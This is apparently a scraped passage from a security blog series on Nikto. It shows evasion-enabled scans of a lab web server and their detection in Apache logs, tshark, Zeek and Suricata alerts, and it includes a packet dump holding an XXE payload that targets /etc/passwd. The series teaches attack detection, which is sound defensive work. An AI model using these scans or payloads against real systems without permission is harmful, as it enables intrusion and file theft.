border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 3 -evasion 2</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Using Encoding: Directory self-reference (/./)</span>
<span style="color: white;">+ Start Time: 2023-05-31 15:46:03 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /%2e/ - Redirects (302) to http://10.0.0.106/dashboard/ , Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.</span>
<span style="color: white;">+ /?sql_debug=1 - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.</span>
<span style="color: white;">+ /index.php?sql_debug=1 - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.</span>
<span style="color: white;">...</span>
<span style="color: white;">/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// - Redirects (302) to http://10.0.0.106/dashboard/ , Abyss 1.03 reveals directory listing when multiple /'s are requested.</span>
<span style="color: white;">...</span>
<span style="color: white;">+ End Time: 2023-05-31 15:46:19 (GMT-4) (16 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p><b><span style="font-size: medium;">Detect - Log Analysis</span></b></p><p>Looking at the first 5 lines of the <i>access.log</i> file.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ head access.log --lines=5</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./cgi.cgi/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./webcgi/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./cgi-914/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div><p></p><p>As always, looking at the HTTP Methods. Why so much emphasis on the HTTP methods? Well this is a HTTP based attack, isn't it?!</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 2 --delimiter '"' | cut -f 1 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 1743 GET</span>
<span style="color: white;"> 5 POST</span>
<span style="color: white;"> 3 OPTIONS</span>
<span style="color: white;"> 2 TRACK</span>
<span style="color: white;"> 1 TRACE</span>
<span style="color: white;"> 1 PUT</span>
<span style="color: white;"> 1 PROPFIND</span>
<span style="color: white;"> 1 INDEX</span>
<span style="color: white;"> 1 GSHJQSVC</span>
<span style="color: white;"> 1 get</span>
<span style="color: white;"> 1 DEBUG</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Int the interest of time, let's focus on the response codes:</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 3 --delimiter '"' | cut -f 2 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 1665 404</span>
<span style="color: white;"> 48 302</span>
<span style="color: white;"> 24 403</span>
<span style="color: white;"> 10 400</span>
<span style="color: white;"> 6 503</span>
<span style="color: white;"> 3 200</span>
<span style="color: white;"> 1 HTTP/1.1</span>
<span style="color: white;"> 1 417</span>
<span style="color: white;"> 1 405</span>
<span style="color: white;"> 1 >\\\</span>
</pre></div>
</div><div><br /></div><div><div>Focusing only on the 3 <i>200</i> codes:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp '\s+200\s+'</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:45 -0400] "GET /./favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:45 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:45 -0400] "TRACE /./ HTTP/1.0" 200 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div>
</div><div><br /></div><div>Nothing pressing above. Transitioning to packet analysis.</div><p><span style="font-size: medium;"><b>Detect - Packet Analysis</b></span></p><p>Looking at the packets where the response codes is <i>200</i>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ tshark -n -r tuning_3.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -E header=y</span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.stream</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 4</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 8</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 9</span>
</pre></div>
</div><div><br /></div><div>Following stream 4, we see <i>favicon.ico</i> file was requested and returned successfully. We also see the size of the <i>.ico</i> file was <i>30894</i> bytes.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span>└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200|s+OK" --before-context=7 --after-context=11</span>
<span style="font-weight: bold;">GET</span> <span>/./favicon.ico</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
1460
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive</span>
Content-Type: image/x-icon
</pre></div>
</div><div><br /></div><div>What is in stream <i>8</i>?</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span>└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,8 | grep --perl-regexp "\s+200|s+OK" --before-context=7 --after-context=7</span>
<span style="font-weight: bold;">OPTIONS</span> <span>*</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
187
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 0
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
</span></pre></div>
</div><div><br /></div><div>Wrapping this up with stream <i>9</i>.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span>└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,9 | grep --perl-regexp "\s+200|s+OK" --before-context=7 --after-context=5</span>
<span style="font-weight: bold;">TRACE</span> <span>/./</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.0</span>
<span style="font-weight: bold;">Trace-Test</span><span>:</span> <span>Nikto</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
354
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Connection: close
Content-Type: message/http</span>
</pre></div>
</div><div><br /></div><div>Nothing of much interest in these logs so far.</div><div><br /></div><div><b>Detect - Zeek Analysis</b></div><div><br /></div><div>Setup Zeek</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div>Once again, focusing only on the requests which were successful.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ grep --perl-regexp '\s+200\s+' http.log </span>
<span style="color: white;">1685562364.123858 CQL8E11QNWY25b3JN8 10.0.0.108 42706 10.0.0.106 80 53 GET 10.0.0.106 /./favicon.ico - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 30894 200 OK - - (empty) - - - - - - F4aCd4167hfNQFAJac -image/x-icon</span>
<span style="color: white;">1685562364.456930 CTvaTF2T3PeQ14SQBj 10.0.0.108 59226 10.0.0.106 80 24 OPTIONS 10.0.0.106 * - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 0 200 OK - - (empty) - - - - - - - - -</span>
<span style="color: white;">1685562364.473468 CD9XXK1A6PKuRKepl3 10.0.0.108 59240 10.0.0.106 80 1 TRACE - /./ - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 194 200 OK - - (empty) - - - - - - - - -</span>
</pre></div>
</div><div><br /><div>No need to dig deeper at this time</div><div><br /></div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div><div><br /></div><div>Setup Suricata to operate in IDS mode</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all</span>
</pre></div>
</div><div><br />How many unique alerts were generated for this activity?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines</span>
<span style="color: white;">42</span>
</pre></div>
</div><div><br /></div><div><div>What does the top 5 alerts look like?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5</span>
<span style="color: white;"> 32 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 27 1:2101201:11] GPL WEB_SERVER 403 Forbidden </span>
<span style="color: white;"> 18 1:2101071:8] GPL WEB_SERVER .htpasswd access </span>
<span style="color: white;"> 16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. </span>
<span style="color: white;"> 13 1:2019526:5] ET WEB_SERVER WEB-PHP phpinfo access </span>
</pre></div>
</div><div><br /></div><div>We have seen some of those before. What is this one with "<i>ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY.</i>" Peeking into it a bit.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat alert-debug.log | grep xxe --before-context=42 | more </span>
<span style="color: white;">+================</span>
<span style="color: white;">TIME: 05/31/2023-15:46:18.795363</span>
<span style="color: white;">PKT SRC: wire/pcap</span>
<span style="color: white;">SRC IP: 10.0.0.108</span>
<span style="color: white;">DST IP: 10.0.0.106</span>
<span style="color: white;">PROTO: 6</span>
<span style="color: white;">SRC PORT: 56368</span>
<span style="color: white;">DST PORT: 80</span>
<span style="color: white;">TCP SEQ: 2333024969</span>
<span style="color: white;">TCP ACK: 3679706670</span>
<span style="color: white;">FLOW: to_server: TRUE, to_client: FALSE</span>
<span style="color: white;">FLOW Start TS: 05/31/2023-15:46:18.675078</span>
<span style="color: white;">FLOW PKTS TODST: 62</span>
<span style="color: white;">FLOW PKTS TOSRC: 59</span>
<span style="color: white;">FLOW Total Bytes: 51064</span>
<span style="color: white;">FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE</span>
<span style="color: white;">FLOW ACTION: DROP: FALSE</span>
<span style="color: white;">FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE</span>
<span style="color: white;">FLOW APP_LAYER: DETECTED: TRUE, PROTO 1</span>
<span style="color: white;">PACKET LEN: 995</span>
<span style="color: white;">PACKET:</span>
<span style="color: white;"> 0000 08 00 27 88 B8 34 08 00 27 DB 96 6A 08 00 45 00 ..'..4.. '..j..E.</span>
<span style="color: white;"> 0010 03 D5 0F A3 40 00 40 06 12 AB 0A 00 00 6C 0A 00 ....@.@. .....l..</span>
<span style="color: white;"> 0020 00 6A DC 30 00 50 8B 0F 22 C9 DB 53 DE 2E 50 18 .j.0.P.. "..S..P.</span>
<span style="color: white;"> 0030 01 F5 18 9D 00 00 47 45 54 20 2F 2E 2F 66 6C 65 ......GE T /./fle</span>
<span style="color: white;"> 0040 78 32 67 61 74 65 77 61 79 2F 2E 2F 20 48 54 54 x2gatewa y/./ HTT</span>
<span style="color: white;"> 0050 50 2F 31 2E 31 0D 0A 63 6F 6E 74 65 6E 74 2D 6C P/1.1..c ontent-l</span>
<span style="color: white;"> 0060 65 6E 67 74 68 3A 20 37 31 34 0D 0A 43 6F 6E 6E ength: 7 14..Conn</span>
<span style="color: white;"> 0070 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali</span>
<span style="color: white;"> 0080 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 ve..User -Agent: </span>
<span style="color: white;"> 0090 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E Mozilla/ 5.0 (Win</span>
<span style="color: white;"> 00A0 64 6F 77 73 20 4E 54 20 31 30 2E 30 3B 20 57 69 dows NT 10.0; Wi</span>
<span style="color: white;"> 00B0 6E 36 34 3B 20 78 36 34 29 20 41 70 70 6C 65 57 n64; x64 ) AppleW</span>
<span style="color: white;"> 00C0 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 4B 48 ebKit/53 7.36 (KH</span>
<span style="color: white;"> 00D0 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 TML, lik e Gecko)</span>
<span style="color: white;"> 00E0 20 43 68 72 6F 6D 65 2F 37 34 2E 30 2E 33 37 32 Chrome/ 74.0.372</span>
<span style="color: white;"> 00F0 39 2E 31 36 39 20 53 61 66 61 72 69 2F 35 33 37 9.169 Sa fari/537</span>
<span style="color: white;"> 0100 2E 33 36 0D 0A 68 6F 73 74 3A 20 31 30 2E 30 2E .36..hos t: 10.0.</span>
<span style="color: white;"> 0110 30 2E 31 30 36 0D 0A 0D 0A 3C 3F 78 6D 6C 20 76 0.106... .<?xml v</span>
<span style="color: white;"> 0120 65 72 73 69 6F 6E 3D 22 31 2E 30 22 20 65 6E 63 ersion=" 1.0" enc</span>
<span style="color: white;"> 0130 6F 64 69 6E 67 3D 22 75 74 66 2D 38 22 3F 3E 3C oding="u tf-8"?><</span>
<span style="color: white;"> 0140 21 44 4F 43 54 59 50 45 20 74 65 73 74 20 5B 20 !DOCTYPE test [ </span>
<span style="color: white;"> 0150 3C 21 45 4E 54 49 54 59 20 78 78 65 20 53 59 53 <!ENTITY xxe SYS</span>
<span style="color: white;"> 0160 54 45 4D 20 22 2F 65 74 63 2F 70 61 73 73 77 64 TEM "/et c/passwd</span>
<span style="color: white;"> 0170 22 3E 20 5D 3E 3C 61 6D 66 78 20 76 65 72 3D 22 "> ]><am fx ver="</span>
<span style="color: white;"> 0180 33 22 20 78 6D 6C 6E 73 3D 22 68 74 74 70 3A 2F 3" xmlns ="http:/</span>
<span style="color: white;"> 0190 2F 77 77 77 2E 6D 61 63 72 6F 6D 65 64 69 61 2E /www.mac romedia.</span>
</pre></div>
</div><div><br /></div><div>Well that is enough peeking for now.</div><div><br /></div><div><br /></div><div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-16134998262616268022023-12-12T18:23:00.000-08:002023-12-12T18:38:01.095-08:00Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)<p><span>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </span></p><p><span>From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.<br /><br /></span></p><p><b><span style="font-size: medium;">The Hack -Misconfiguration / Default File" with evasion type 1 -> Random URI encoding (non-UTF8)</span></b></p><p>Running Nikto with evasion type <i>1 - Random URI encoding</i>. This time, the attack is "<i>Misconfiguration / Default File"</i>. This builds on the previous post.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 1 -evasion 1</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Using Encoding: Random URI encoding (non-UTF8)</span>
<span style="color: white;">+ Start Time: 2023-05-31 09:17:47 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</span>
<span style="color: white;">+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/</span>
<span style="color: white;">+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.</span>
<span style="color: white;">+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.</span>
<span style="color: white;">+ /: Retrieved x-powered-by header: PHP/8.0.28.</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">+ // - Redirects (302) to http://10.0.0.106/dashboard/ , Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default IBM TotalStorage server found.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default EMC Cellera manager server is running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default EMC ControlCenter manager server is running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Sun Answerbook server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default JRun 2 server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Cisco VoIP Phone default web server found.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Sybase Jaguar CTS server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Lantronix printer found.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default IBM Tivoli Server Administration server is running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default JRun 4 server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Lotus Domino server running.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default Sambar install.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default IIS 4.0 install.</span>
<span style="color: white;">+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default Netscape/iPlanet 6 install.</span>
<span style="color: white;">+ /?sc_mode=edit - Redirects (302) to http://10.0.0.106/dashboard/ , Sitecore CMS is installed. This url redirects to the login page.</span>
<span style="color: white;">+ 1466 requests: 0 error(s) and 6 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-05-31 09:17:54 (GMT-4) (7 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
